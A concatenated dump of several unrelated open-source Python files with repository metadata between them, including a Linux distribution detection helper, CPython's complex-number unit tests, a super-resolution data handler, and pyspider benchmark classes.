# Thanks to Daenyth for help porting this to Arch Linux. import os, platform, re, subprocess _distributor_id_cmdline_re = re.compile("(?:Distributor ID:)\s*(.*)", re.I) _release_cmdline_re = re.compile("(?:Release:)\s*(.*)", re.I) _distributor_id_file_re = re.compile("(?:DISTRIB_ID\s*=)\s*(.*)", re.I) _release_file_re = re.compile("(?:DISTRIB_RELEASE\s*=)\s*(.*)", re.I) global _distname,_version _distname = None _version = None def get_linux_distro(): """ Tries to determine the name of the Linux OS distribution name. First, try to parse a file named "/etc/lsb-release". If it exists, and contains the "DISTRIB_ID=" line and the "DISTRIB_RELEASE=" line, then return the strings parsed from that file. If that doesn't work, then invoke platform.dist(). If that doesn't work, then try to execute "lsb_release", as standardized in 2001: http://refspecs.freestandards.org/LSB_1.0.0/gLSB/lsbrelease.html The current version of the standard is here: http://refspecs.freestandards.org/LSB_3.2.0/LSB-Core-generic/LSB-Core-generic/lsbrelease.html that lsb_release emitted, as strings. Returns a tuple (distname,version). Distname is what LSB calls a "distributor id", e.g. "Ubuntu". Version is what LSB calls a "release", e.g. "8.04". 
A version of this has been submitted to python as a patch for the standard library module "platform": http://bugs.python.org/issue3937 """ global _distname,_version if _distname and _version: return (_distname, _version) try: etclsbrel = open("/etc/lsb-release", "rU") for line in etclsbrel: m = _distributor_id_file_re.search(line) if m: _distname = m.group(1).strip() if _distname and _version: return (_distname, _version) m = _release_file_re.search(line) if m: _version = m.group(1).strip() if _distname and _version: return (_distname, _version) except EnvironmentError: pass (_distname, _version) = platform.dist()[:2] if _distname and _version: return (_distname, _version) try: p = subprocess.Popen(["lsb_release", "--all"], stdout=subprocess.PIPE, stderr=subprocess.PIPE) rc = p.wait() if rc == 0: for line in p.stdout.readlines(): m = _distributor_id_cmdline_re.search(line) if m: _distname = m.group(1).strip() if _distname and _version: return (_distname, _version) m = _release_cmdline_re.search(p.stdout.read()) if m: _version = m.group(1).strip() if _distname and _version: return (_distname, _version) except EnvironmentError: pass if os.path.exists("/etc/arch-release"): return ("Arch_Linux", "") return (_distname,_version) def get_platform(): # Our version of platform.platform(), telling us both less and more than the # Python Standard Library's version does. # We omit details such as the Linux kernel version number, but we add a # more detailed and correct rendition of the Linux distribution and # distribution-version. if "linux" in platform.system().lower(): return platform.system()+"-"+"_".join(get_linux_distro())+"-"+platform.machine()+"-"+"_".join([x for x in platform.architecture() if x]) else: return platform.platform()
gpl-3.0
hynnet/openwrt-mt7620
staging_dir/host/lib/python2.7/test/test_complex.py
93
27585
import unittest from test import test_support from random import random from math import atan2, isnan, copysign INF = float("inf") NAN = float("nan") # These tests ensure that complex math does the right thing class ComplexTest(unittest.TestCase): def assertAlmostEqual(self, a, b): if isinstance(a, complex): if isinstance(b, complex): unittest.TestCase.assertAlmostEqual(self, a.real, b.real) unittest.TestCase.assertAlmostEqual(self, a.imag, b.imag) else: unittest.TestCase.assertAlmostEqual(self, a.real, b) unittest.TestCase.assertAlmostEqual(self, a.imag, 0.) else: if isinstance(b, complex): unittest.TestCase.assertAlmostEqual(self, a, b.real) unittest.TestCase.assertAlmostEqual(self, 0., b.imag) else: unittest.TestCase.assertAlmostEqual(self, a, b) def assertCloseAbs(self, x, y, eps=1e-9): """Return true iff floats x and y "are close\"""" # put the one with larger magnitude second if abs(x) > abs(y): x, y = y, x if y == 0: return abs(x) < eps if x == 0: return abs(y) < eps # check that relative difference < eps self.assertTrue(abs((x-y)/y) < eps) def assertFloatsAreIdentical(self, x, y): """assert that floats x and y are identical, in the sense that: (1) both x and y are nans, or (2) both x and y are infinities, with the same sign, or (3) both x and y are zeros, with the same sign, or (4) x and y are both finite and nonzero, and x == y """ msg = 'floats {!r} and {!r} are not identical' if isnan(x) or isnan(y): if isnan(x) and isnan(y): return elif x == y: if x != 0.0: return # both zero; check that signs match elif copysign(1.0, x) == copysign(1.0, y): return else: msg += ': zeros have different signs' self.fail(msg.format(x, y)) def assertClose(self, x, y, eps=1e-9): """Return true iff complexes x and y "are close\"""" self.assertCloseAbs(x.real, y.real, eps) self.assertCloseAbs(x.imag, y.imag, eps) def check_div(self, x, y): """Compute complex z=x*y, and check that z/x==y and z/y==x.""" z = x * y if x != 0: q = z / x self.assertClose(q, y) q = z.__div__(x) 
self.assertClose(q, y) q = z.__truediv__(x) self.assertClose(q, y) if y != 0: q = z / y self.assertClose(q, x) q = z.__div__(y) self.assertClose(q, x) q = z.__truediv__(y) self.assertClose(q, x) def test_div(self): simple_real = [float(i) for i in xrange(-5, 6)] simple_complex = [complex(x, y) for x in simple_real for y in simple_real] for x in simple_complex: for y in simple_complex: self.check_div(x, y) # A naive complex division algorithm (such as in 2.0) is very prone to # nonsense errors for these (overflows and underflows). self.check_div(complex(1e200, 1e200), 1+0j) self.check_div(complex(1e-200, 1e-200), 1+0j) # Just for fun. for i in xrange(100): self.check_div(complex(random(), random()), complex(random(), random())) self.assertRaises(ZeroDivisionError, complex.__div__, 1+1j, 0+0j) # FIXME: The following currently crashes on Alpha # self.assertRaises(OverflowError, pow, 1e200+1j, 1e200+1j) def test_truediv(self): self.assertAlmostEqual(complex.__truediv__(2+0j, 1+1j), 1-1j) self.assertRaises(ZeroDivisionError, complex.__truediv__, 1+1j, 0+0j) def test_floordiv(self): self.assertAlmostEqual(complex.__floordiv__(3+0j, 1.5+0j), 2) self.assertRaises(ZeroDivisionError, complex.__floordiv__, 3+0j, 0+0j) def test_coerce(self): self.assertRaises(OverflowError, complex.__coerce__, 1+1j, 1L<<10000) def test_no_implicit_coerce(self): # Python 2.7 removed implicit coercion from the complex type class A(object): def __coerce__(self, other): raise RuntimeError __hash__ = None def __cmp__(self, other): return -1 a = A() self.assertRaises(TypeError, lambda: a + 2.0j) self.assertTrue(a < 2.0j) def test_richcompare(self): self.assertEqual(complex.__eq__(1+1j, 1L<<10000), False) self.assertEqual(complex.__lt__(1+1j, None), NotImplemented) self.assertIs(complex.__eq__(1+1j, 1+1j), True) self.assertIs(complex.__eq__(1+1j, 2+2j), False) self.assertIs(complex.__ne__(1+1j, 1+1j), False) self.assertIs(complex.__ne__(1+1j, 2+2j), True) self.assertRaises(TypeError, complex.__lt__, 
1+1j, 2+2j) self.assertRaises(TypeError, complex.__le__, 1+1j, 2+2j) self.assertRaises(TypeError, complex.__gt__, 1+1j, 2+2j) self.assertRaises(TypeError, complex.__ge__, 1+1j, 2+2j) def test_richcompare_boundaries(self): def check(n, deltas, is_equal, imag = 0.0): for delta in deltas: i = n + delta z = complex(i, imag) self.assertIs(complex.__eq__(z, i), is_equal(delta)) self.assertIs(complex.__ne__(z, i), not is_equal(delta)) # For IEEE-754 doubles the following should hold: # x in [2 ** (52 + i), 2 ** (53 + i + 1)] -> x mod 2 ** i == 0 # where the interval is representable, of course. for i in range(1, 10): pow = 52 + i mult = 2 ** i check(2 ** pow, range(1, 101), lambda delta: delta % mult == 0) check(2 ** pow, range(1, 101), lambda delta: False, float(i)) check(2 ** 53, range(-100, 0), lambda delta: True) def test_mod(self): self.assertRaises(ZeroDivisionError, (1+1j).__mod__, 0+0j) a = 3.33+4.43j try: a % 0 except ZeroDivisionError: pass else: self.fail("modulo parama can't be 0") def test_divmod(self): self.assertRaises(ZeroDivisionError, divmod, 1+1j, 0+0j) def test_pow(self): self.assertAlmostEqual(pow(1+1j, 0+0j), 1.0) self.assertAlmostEqual(pow(0+0j, 2+0j), 0.0) self.assertRaises(ZeroDivisionError, pow, 0+0j, 1j) self.assertAlmostEqual(pow(1j, -1), 1/1j) self.assertAlmostEqual(pow(1j, 200), 1) self.assertRaises(ValueError, pow, 1+1j, 1+1j, 1+1j) a = 3.33+4.43j self.assertEqual(a ** 0j, 1) self.assertEqual(a ** 0.+0.j, 1) self.assertEqual(3j ** 0j, 1) self.assertEqual(3j ** 0, 1) try: 0j ** a except ZeroDivisionError: pass else: self.fail("should fail 0.0 to negative or complex power") try: 0j ** (3-2j) except ZeroDivisionError: pass else: self.fail("should fail 0.0 to negative or complex power") # The following is used to exercise certain code paths self.assertEqual(a ** 105, a ** 105) self.assertEqual(a ** -105, a ** -105) self.assertEqual(a ** -30, a ** -30) self.assertEqual(0.0j ** 0, 1) b = 5.1+2.3j self.assertRaises(ValueError, pow, a, b, 0) def 
test_boolcontext(self): for i in xrange(100): self.assertTrue(complex(random() + 1e-6, random() + 1e-6)) self.assertTrue(not complex(0.0, 0.0)) def test_conjugate(self): self.assertClose(complex(5.3, 9.8).conjugate(), 5.3-9.8j) def test_constructor(self): class OS: def __init__(self, value): self.value = value def __complex__(self): return self.value class NS(object): def __init__(self, value): self.value = value def __complex__(self): return self.value self.assertEqual(complex(OS(1+10j)), 1+10j) self.assertEqual(complex(NS(1+10j)), 1+10j) self.assertRaises(TypeError, complex, OS(None)) self.assertRaises(TypeError, complex, NS(None)) self.assertAlmostEqual(complex("1+10j"), 1+10j) self.assertAlmostEqual(complex(10), 10+0j) self.assertAlmostEqual(complex(10.0), 10+0j) self.assertAlmostEqual(complex(10L), 10+0j) self.assertAlmostEqual(complex(10+0j), 10+0j) self.assertAlmostEqual(complex(1,10), 1+10j) self.assertAlmostEqual(complex(1,10L), 1+10j) self.assertAlmostEqual(complex(1,10.0), 1+10j) self.assertAlmostEqual(complex(1L,10), 1+10j) self.assertAlmostEqual(complex(1L,10L), 1+10j) self.assertAlmostEqual(complex(1L,10.0), 1+10j) self.assertAlmostEqual(complex(1.0,10), 1+10j) self.assertAlmostEqual(complex(1.0,10L), 1+10j) self.assertAlmostEqual(complex(1.0,10.0), 1+10j) self.assertAlmostEqual(complex(3.14+0j), 3.14+0j) self.assertAlmostEqual(complex(3.14), 3.14+0j) self.assertAlmostEqual(complex(314), 314.0+0j) self.assertAlmostEqual(complex(314L), 314.0+0j) self.assertAlmostEqual(complex(3.14+0j, 0j), 3.14+0j) self.assertAlmostEqual(complex(3.14, 0.0), 3.14+0j) self.assertAlmostEqual(complex(314, 0), 314.0+0j) self.assertAlmostEqual(complex(314L, 0L), 314.0+0j) self.assertAlmostEqual(complex(0j, 3.14j), -3.14+0j) self.assertAlmostEqual(complex(0.0, 3.14j), -3.14+0j) self.assertAlmostEqual(complex(0j, 3.14), 3.14j) self.assertAlmostEqual(complex(0.0, 3.14), 3.14j) self.assertAlmostEqual(complex("1"), 1+0j) self.assertAlmostEqual(complex("1j"), 1j) 
self.assertAlmostEqual(complex(), 0) self.assertAlmostEqual(complex("-1"), -1) self.assertAlmostEqual(complex("+1"), +1) self.assertAlmostEqual(complex("(1+2j)"), 1+2j) self.assertAlmostEqual(complex("(1.3+2.2j)"), 1.3+2.2j) self.assertAlmostEqual(complex("3.14+1J"), 3.14+1j) self.assertAlmostEqual(complex(" ( +3.14-6J )"), 3.14-6j) self.assertAlmostEqual(complex(" ( +3.14-J )"), 3.14-1j) self.assertAlmostEqual(complex(" ( +3.14+j )"), 3.14+1j) self.assertAlmostEqual(complex("J"), 1j) self.assertAlmostEqual(complex("( j )"), 1j) self.assertAlmostEqual(complex("+J"), 1j) self.assertAlmostEqual(complex("( -j)"), -1j) self.assertAlmostEqual(complex('1e-500'), 0.0 + 0.0j) self.assertAlmostEqual(complex('-1e-500j'), 0.0 - 0.0j) self.assertAlmostEqual(complex('-1e-500+1e-500j'), -0.0 + 0.0j) class complex2(complex): pass self.assertAlmostEqual(complex(complex2(1+1j)), 1+1j) self.assertAlmostEqual(complex(real=17, imag=23), 17+23j) self.assertAlmostEqual(complex(real=17+23j), 17+23j) self.assertAlmostEqual(complex(real=17+23j, imag=23), 17+46j) self.assertAlmostEqual(complex(real=1+2j, imag=3+4j), -3+5j) # check that the sign of a zero in the real or imaginary part # is preserved when constructing from two floats. (These checks # are harmless on systems without support for signed zeros.) def split_zeros(x): """Function that produces different results for 0. and -0.""" return atan2(x, -1.) self.assertEqual(split_zeros(complex(1., 0.).imag), split_zeros(0.)) self.assertEqual(split_zeros(complex(1., -0.).imag), split_zeros(-0.)) self.assertEqual(split_zeros(complex(0., 1.).real), split_zeros(0.)) self.assertEqual(split_zeros(complex(-0., 1.).real), split_zeros(-0.)) c = 3.14 + 1j self.assertTrue(complex(c) is c) del c self.assertRaises(TypeError, complex, "1", "1") self.assertRaises(TypeError, complex, 1, "1") if test_support.have_unicode: self.assertEqual(complex(unicode(" 3.14+J ")), 3.14+1j) # SF bug 543840: complex(string) accepts strings with \0 # Fixed in 2.3. 
self.assertRaises(ValueError, complex, '1+1j\0j') self.assertRaises(TypeError, int, 5+3j) self.assertRaises(TypeError, long, 5+3j) self.assertRaises(TypeError, float, 5+3j) self.assertRaises(ValueError, complex, "") self.assertRaises(TypeError, complex, None) self.assertRaises(ValueError, complex, "\0") self.assertRaises(ValueError, complex, "3\09") self.assertRaises(TypeError, complex, "1", "2") self.assertRaises(TypeError, complex, "1", 42) self.assertRaises(TypeError, complex, 1, "2") self.assertRaises(ValueError, complex, "1+") self.assertRaises(ValueError, complex, "1+1j+1j") self.assertRaises(ValueError, complex, "--") self.assertRaises(ValueError, complex, "(1+2j") self.assertRaises(ValueError, complex, "1+2j)") self.assertRaises(ValueError, complex, "1+(2j)") self.assertRaises(ValueError, complex, "(1+2j)123") if test_support.have_unicode: self.assertRaises(ValueError, complex, unicode("x")) self.assertRaises(ValueError, complex, "1j+2") self.assertRaises(ValueError, complex, "1e1ej") self.assertRaises(ValueError, complex, "1e++1ej") self.assertRaises(ValueError, complex, ")1+2j(") # the following three are accepted by Python 2.6 self.assertRaises(ValueError, complex, "1..1j") self.assertRaises(ValueError, complex, "1.11.1j") self.assertRaises(ValueError, complex, "1e1.1j") if test_support.have_unicode: # check that complex accepts long unicode strings self.assertEqual(type(complex(unicode("1"*500))), complex) class EvilExc(Exception): pass class evilcomplex: def __complex__(self): raise EvilExc self.assertRaises(EvilExc, complex, evilcomplex()) class float2: def __init__(self, value): self.value = value def __float__(self): return self.value self.assertAlmostEqual(complex(float2(42.)), 42) self.assertAlmostEqual(complex(real=float2(17.), imag=float2(23.)), 17+23j) self.assertRaises(TypeError, complex, float2(None)) class complex0(complex): """Test usage of __complex__() when inheriting from 'complex'""" def __complex__(self): return 42j class 
complex1(complex): """Test usage of __complex__() with a __new__() method""" def __new__(self, value=0j): return complex.__new__(self, 2*value) def __complex__(self): return self class complex2(complex): """Make sure that __complex__() calls fail if anything other than a complex is returned""" def __complex__(self): return None self.assertAlmostEqual(complex(complex0(1j)), 42j) self.assertAlmostEqual(complex(complex1(1j)), 2j) self.assertRaises(TypeError, complex, complex2(1j)) def test_subclass(self): class xcomplex(complex): def __add__(self,other): return xcomplex(complex(self) + other) __radd__ = __add__ def __sub__(self,other): return xcomplex(complex(self) + other) __rsub__ = __sub__ def __mul__(self,other): return xcomplex(complex(self) * other) __rmul__ = __mul__ def __div__(self,other): return xcomplex(complex(self) / other) def __rdiv__(self,other): return xcomplex(other / complex(self)) __truediv__ = __div__ __rtruediv__ = __rdiv__ def __floordiv__(self,other): return xcomplex(complex(self) // other) def __rfloordiv__(self,other): return xcomplex(other // complex(self)) def __pow__(self,other): return xcomplex(complex(self) ** other) def __rpow__(self,other): return xcomplex(other ** complex(self) ) def __mod__(self,other): return xcomplex(complex(self) % other) def __rmod__(self,other): return xcomplex(other % complex(self)) infix_binops = ('+', '-', '*', '**', '%', '//', '/') xcomplex_values = (xcomplex(1), xcomplex(123.0), xcomplex(-10+2j), xcomplex(3+187j), xcomplex(3-78j)) test_values = (1, 123.0, 10-19j, xcomplex(1+2j), xcomplex(1+87j), xcomplex(10+90j)) for op in infix_binops: for x in xcomplex_values: for y in test_values: a = 'x %s y' % op b = 'y %s x' % op self.assertTrue(type(eval(a)) is type(eval(b)) is xcomplex) def test_hash(self): for x in xrange(-30, 30): self.assertEqual(hash(x), hash(complex(x, 0))) x /= 3.0 # now check against floating point self.assertEqual(hash(x), hash(complex(x, 0.))) def test_abs(self): nums = [complex(x/3., y/7.) 
for x in xrange(-9,9) for y in xrange(-9,9)] for num in nums: self.assertAlmostEqual((num.real**2 + num.imag**2) ** 0.5, abs(num)) def test_repr(self): self.assertEqual(repr(1+6j), '(1+6j)') self.assertEqual(repr(1-6j), '(1-6j)') self.assertNotEqual(repr(-(1+0j)), '(-1+-0j)') self.assertEqual(1-6j,complex(repr(1-6j))) self.assertEqual(1+6j,complex(repr(1+6j))) self.assertEqual(-6j,complex(repr(-6j))) self.assertEqual(6j,complex(repr(6j))) self.assertEqual(repr(complex(1., INF)), "(1+infj)") self.assertEqual(repr(complex(1., -INF)), "(1-infj)") self.assertEqual(repr(complex(INF, 1)), "(inf+1j)") self.assertEqual(repr(complex(-INF, INF)), "(-inf+infj)") self.assertEqual(repr(complex(NAN, 1)), "(nan+1j)") self.assertEqual(repr(complex(1, NAN)), "(1+nanj)") self.assertEqual(repr(complex(NAN, NAN)), "(nan+nanj)") self.assertEqual(repr(complex(0, INF)), "infj") self.assertEqual(repr(complex(0, -INF)), "-infj") self.assertEqual(repr(complex(0, NAN)), "nanj") def test_neg(self): self.assertEqual(-(1+6j), -1-6j) def test_file(self): a = 3.33+4.43j b = 5.1+2.3j fo = None try: fo = open(test_support.TESTFN, "wb") print >>fo, a, b fo.close() fo = open(test_support.TESTFN, "rb") self.assertEqual(fo.read(), "%s %s\n" % (a, b)) finally: if (fo is not None) and (not fo.closed): fo.close() test_support.unlink(test_support.TESTFN) def test_getnewargs(self): self.assertEqual((1+2j).__getnewargs__(), (1.0, 2.0)) self.assertEqual((1-2j).__getnewargs__(), (1.0, -2.0)) self.assertEqual((2j).__getnewargs__(), (0.0, 2.0)) self.assertEqual((-0j).__getnewargs__(), (0.0, -0.0)) self.assertEqual(complex(0, INF).__getnewargs__(), (0.0, INF)) self.assertEqual(complex(INF, 0).__getnewargs__(), (INF, 0.0)) if float.__getformat__("double").startswith("IEEE"): def test_plus_minus_0j(self): # test that -0j and 0j literals are not identified z1, z2 = 0j, -0j self.assertEqual(atan2(z1.imag, -1.), atan2(0., -1.)) self.assertEqual(atan2(z2.imag, -1.), atan2(-0., -1.)) 
@unittest.skipUnless(float.__getformat__("double").startswith("IEEE"), "test requires IEEE 754 doubles") def test_overflow(self): self.assertEqual(complex("1e500"), complex(INF, 0.0)) self.assertEqual(complex("-1e500j"), complex(0.0, -INF)) self.assertEqual(complex("-1e500+1.8e308j"), complex(-INF, INF)) @unittest.skipUnless(float.__getformat__("double").startswith("IEEE"), "test requires IEEE 754 doubles") def test_repr_roundtrip(self): vals = [0.0, 1e-500, 1e-315, 1e-200, 0.0123, 3.1415, 1e50, INF, NAN] vals += [-v for v in vals] # complex(repr(z)) should recover z exactly, even for complex # numbers involving an infinity, nan, or negative zero for x in vals: for y in vals: z = complex(x, y) roundtrip = complex(repr(z)) self.assertFloatsAreIdentical(z.real, roundtrip.real) self.assertFloatsAreIdentical(z.imag, roundtrip.imag) # if we predefine some constants, then eval(repr(z)) should # also work, except that it might change the sign of zeros inf, nan = float('inf'), float('nan') infj, nanj = complex(0.0, inf), complex(0.0, nan) for x in vals: for y in vals: z = complex(x, y) roundtrip = eval(repr(z)) # adding 0.0 has no effect beside changing -0.0 to 0.0 self.assertFloatsAreIdentical(0.0 + z.real, 0.0 + roundtrip.real) self.assertFloatsAreIdentical(0.0 + z.imag, 0.0 + roundtrip.imag) def test_format(self): # empty format string is same as str() self.assertEqual(format(1+3j, ''), str(1+3j)) self.assertEqual(format(1.5+3.5j, ''), str(1.5+3.5j)) self.assertEqual(format(3j, ''), str(3j)) self.assertEqual(format(3.2j, ''), str(3.2j)) self.assertEqual(format(3+0j, ''), str(3+0j)) self.assertEqual(format(3.2+0j, ''), str(3.2+0j)) # empty presentation type should still be analogous to str, # even when format string is nonempty (issue #5920). self.assertEqual(format(3.2+0j, '-'), str(3.2+0j)) self.assertEqual(format(3.2+0j, '<'), str(3.2+0j)) z = 4/7. - 100j/7. 
self.assertEqual(format(z, ''), str(z)) self.assertEqual(format(z, '-'), str(z)) self.assertEqual(format(z, '<'), str(z)) self.assertEqual(format(z, '10'), str(z)) z = complex(0.0, 3.0) self.assertEqual(format(z, ''), str(z)) self.assertEqual(format(z, '-'), str(z)) self.assertEqual(format(z, '<'), str(z)) self.assertEqual(format(z, '2'), str(z)) z = complex(-0.0, 2.0) self.assertEqual(format(z, ''), str(z)) self.assertEqual(format(z, '-'), str(z)) self.assertEqual(format(z, '<'), str(z)) self.assertEqual(format(z, '3'), str(z)) self.assertEqual(format(1+3j, 'g'), '1+3j') self.assertEqual(format(3j, 'g'), '0+3j') self.assertEqual(format(1.5+3.5j, 'g'), '1.5+3.5j') self.assertEqual(format(1.5+3.5j, '+g'), '+1.5+3.5j') self.assertEqual(format(1.5-3.5j, '+g'), '+1.5-3.5j') self.assertEqual(format(1.5-3.5j, '-g'), '1.5-3.5j') self.assertEqual(format(1.5+3.5j, ' g'), ' 1.5+3.5j') self.assertEqual(format(1.5-3.5j, ' g'), ' 1.5-3.5j') self.assertEqual(format(-1.5+3.5j, ' g'), '-1.5+3.5j') self.assertEqual(format(-1.5-3.5j, ' g'), '-1.5-3.5j') self.assertEqual(format(-1.5-3.5e-20j, 'g'), '-1.5-3.5e-20j') self.assertEqual(format(-1.5-3.5j, 'f'), '-1.500000-3.500000j') self.assertEqual(format(-1.5-3.5j, 'F'), '-1.500000-3.500000j') self.assertEqual(format(-1.5-3.5j, 'e'), '-1.500000e+00-3.500000e+00j') self.assertEqual(format(-1.5-3.5j, '.2e'), '-1.50e+00-3.50e+00j') self.assertEqual(format(-1.5-3.5j, '.2E'), '-1.50E+00-3.50E+00j') self.assertEqual(format(-1.5e10-3.5e5j, '.2G'), '-1.5E+10-3.5E+05j') self.assertEqual(format(1.5+3j, '<20g'), '1.5+3j ') self.assertEqual(format(1.5+3j, '*<20g'), '1.5+3j**************') self.assertEqual(format(1.5+3j, '>20g'), ' 1.5+3j') self.assertEqual(format(1.5+3j, '^20g'), ' 1.5+3j ') self.assertEqual(format(1.5+3j, '<20'), '(1.5+3j) ') self.assertEqual(format(1.5+3j, '>20'), ' (1.5+3j)') self.assertEqual(format(1.5+3j, '^20'), ' (1.5+3j) ') self.assertEqual(format(1.123-3.123j, '^20.2'), ' (1.1-3.1j) ') self.assertEqual(format(1.5+3j, 
'20.2f'), ' 1.50+3.00j') self.assertEqual(format(1.5+3j, '>20.2f'), ' 1.50+3.00j') self.assertEqual(format(1.5+3j, '<20.2f'), '1.50+3.00j ') self.assertEqual(format(1.5e20+3j, '<20.2f'), '150000000000000000000.00+3.00j') self.assertEqual(format(1.5e20+3j, '>40.2f'), ' 150000000000000000000.00+3.00j') self.assertEqual(format(1.5e20+3j, '^40,.2f'), ' 150,000,000,000,000,000,000.00+3.00j ') self.assertEqual(format(1.5e21+3j, '^40,.2f'), ' 1,500,000,000,000,000,000,000.00+3.00j ') self.assertEqual(format(1.5e21+3000j, ',.2f'), '1,500,000,000,000,000,000,000.00+3,000.00j') # alternate is invalid self.assertRaises(ValueError, (1.5+0.5j).__format__, '#f') # zero padding is invalid self.assertRaises(ValueError, (1.5+0.5j).__format__, '010f') # '=' alignment is invalid self.assertRaises(ValueError, (1.5+3j).__format__, '=20') # integer presentation types are an error for t in 'bcdoxX': self.assertRaises(ValueError, (1.5+0.5j).__format__, t) # make sure everything works in ''.format() self.assertEqual('*{0:.3f}*'.format(3.14159+2.71828j), '*3.142+2.718j*') # issue 3382: 'f' and 'F' with inf's and nan's self.assertEqual('{0:f}'.format(INF+0j), 'inf+0.000000j') self.assertEqual('{0:F}'.format(INF+0j), 'INF+0.000000j') self.assertEqual('{0:f}'.format(-INF+0j), '-inf+0.000000j') self.assertEqual('{0:F}'.format(-INF+0j), '-INF+0.000000j') self.assertEqual('{0:f}'.format(complex(INF, INF)), 'inf+infj') self.assertEqual('{0:F}'.format(complex(INF, INF)), 'INF+INFj') self.assertEqual('{0:f}'.format(complex(INF, -INF)), 'inf-infj') self.assertEqual('{0:F}'.format(complex(INF, -INF)), 'INF-INFj') self.assertEqual('{0:f}'.format(complex(-INF, INF)), '-inf+infj') self.assertEqual('{0:F}'.format(complex(-INF, INF)), '-INF+INFj') self.assertEqual('{0:f}'.format(complex(-INF, -INF)), '-inf-infj') self.assertEqual('{0:F}'.format(complex(-INF, -INF)), '-INF-INFj') self.assertEqual('{0:f}'.format(complex(NAN, 0)), 'nan+0.000000j') self.assertEqual('{0:F}'.format(complex(NAN, 0)), 
'NAN+0.000000j') self.assertEqual('{0:f}'.format(complex(NAN, NAN)), 'nan+nanj') self.assertEqual('{0:F}'.format(complex(NAN, NAN)), 'NAN+NANj') def test_main(): with test_support.check_warnings(("complex divmod.., // and % are " "deprecated", DeprecationWarning)): test_support.run_unittest(ComplexTest) if __name__ == "__main__": test_main()
gpl-2.0
nberliner/SRVis
lib/dataHandler.py
1
3758
#!/usr/bin/env python # -*- coding: utf-8 -*- # # This program is free software: you can redistribute it and/or modify # it under the terms of the GNU General Public License as published by # the Free Software Foundation, either version 3 of the License, or # (at your option) any later version. # # This program is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the # GNU General Public License for more details. # # You should have received a copy of the GNU General Public License # along with this program. If not, see <http://www.gnu.org/licenses/>. """ SRVis Copyright (C) 2015 Niklas Berliner """ import sys import numpy as np import tifffile as Tiff from localisationClass import rapidstormLocalisations, XYTLocalisations #from visualiseLocalisations import QuadTree class dataHandler(): """ Interface between the data and the SRVis application The super-resolution data is stored in a pandas DataFrame and the TIFF image is read using tifffile.py (see http://www.lfd.uci.edu/~gohlke/code/tifffile.py.html) """ def __init__(self, fnameImage, fnameLocalisations, fnameLocalisationsType, pixelSize, CpPh): self.fnameLocalisations = fnameLocalisations self.fnameLocalisationsType = fnameLocalisationsType self.pixelSize = pixelSize self.CpPh = CpPh if fnameImage == None or fnameImage == '': self.image = None else: print 'Reading the image' self.image = Tiff.TiffFile(fnameImage) print 'Reading the localisations' self._loadLocalisations() def _loadLocalisations(self): # Here other localisation data types can be added if desired if self.fnameLocalisationsType == 'rapidstorm': self.data = rapidstormLocalisations() self.data.readFile(self.fnameLocalisations, photonConversion=self.CpPh, pixelSize=self.pixelSize) elif self.fnameLocalisationsType == 'xyt': self.data = XYTLocalisations() self.data.readFile(self.fnameLocalisations, pixelSize=self.pixelSize) else: 
print 'No localisation type is checked. Something went wrong..exiting' sys.exit() # Very ugly! Should be changed to a popup! def reloadData(self, dataType): if dataType == 'localisations': self._loadLocalisations() def getImage(self, frame): """ Returns the frame as np.array """ return self.image[frame].asarray() def maxImageFrame(self): """ Returns the number of frames """ if self.image == None: return 0 else: return len(self.image) def getLocalisations(self, frame): """ Return X and Y localisation data as numpy arrays that can be directly used in a matplotlib scatter plot """ data = self.data.localisations() xy = np.asarray(data[ data['frame'] == frame ][['x','y']]) return xy[:,0], xy[:,1] def filterData(self, filterValues): """ Filter the localisation data based on the filter conditions in filterValues. filterValues must be a dict with dataType that should be filtered as keys and the min and max values as values, i.e. e.g. filterValues = dict() filterValues['SNR'] = (20, None) """ self.data.filterAll(filterValues, relative=False) def saveLocalisations(self, fname, pxSize): """ Save the (filtered) localisations to disk """ self.data.writeToFile(fname, pixelSize=pxSize)
gpl-3.0
ubear/Pyspider
pyspider/libs/bench.py
6
2974
#!/usr/bin/env python # -*- encoding: utf-8 -*- # vim: set et sw=4 ts=4 sts=4 ff=unix fenc=utf8: # Author: Binux<roy@binux.me> # http://binux.me # Created on 2014-12-08 22:23:10 import time import logging logger = logging.getLogger('bench') from pyspider.scheduler import Scheduler from pyspider.fetcher.tornado_fetcher import Fetcher from pyspider.processor import Processor from pyspider.result import ResultWorker class BenchMixin(object): """Report to logger for bench test""" def _bench_init(self): self.done_cnt = 0 self.start_time = time.time() self.last_cnt = 0 self.last_report = 0 def _bench_report(self, name, prefix=0, rjust=0): self.done_cnt += 1 now = time.time() if now - self.last_report >= 1: rps = float(self.done_cnt - self.last_cnt) / (now - self.last_report) output = '' if prefix: output += " " * prefix output += ("%s %s pages (at %d pages/min)" % ( name, self.done_cnt, rps * 60.0)).rjust(rjust) logger.info(output) self.last_cnt = self.done_cnt self.last_report = now class BenchScheduler(Scheduler, BenchMixin): def __init__(self, *args, **kwargs): super(BenchScheduler, self).__init__(*args, **kwargs) self._bench_init() def on_task_status(self, task): self._bench_report('Crawled') return super(BenchScheduler, self).on_task_status(task) class BenchFetcher(Fetcher, BenchMixin): def __init__(self, *args, **kwargs): super(BenchFetcher, self).__init__(*args, **kwargs) self._bench_init() def on_result(self, type, task, result): self._bench_report("Fetched", 0, 75) return super(BenchFetcher, self).on_result(type, task, result) class BenchProcessor(Processor, BenchMixin): def __init__(self, *args, **kwargs): super(BenchProcessor, self).__init__(*args, **kwargs) self._bench_init() def on_task(self, task, response): self._bench_report("Processed", 75) return super(BenchProcessor, self).on_task(task, response) class BenchResultWorker(ResultWorker, BenchMixin): def __init__(self, *args, **kwargs): super(BenchResultWorker, self).__init__(*args, **kwargs) 
self._bench_init() def on_result(self, task, result): self._bench_report("Saved", 0, 150) super(BenchResultWorker, self).on_result(task, result) bench_script = ''' from pyspider.libs.base_handler import * class Handler(BaseHandler): def on_start(self): self.crawl('http://127.0.0.1:5000/bench', params={'total': %(total)d, 'show': %(show)d}, callback=self.index_page) def index_page(self, response): for each in response.doc('a[href^="http://"]').items(): self.crawl(each.attr.href, callback=self.index_page) return response.url '''
apache-2.0
wesm/arrow
python/pyarrow/tests/test_schema.py
4
20872
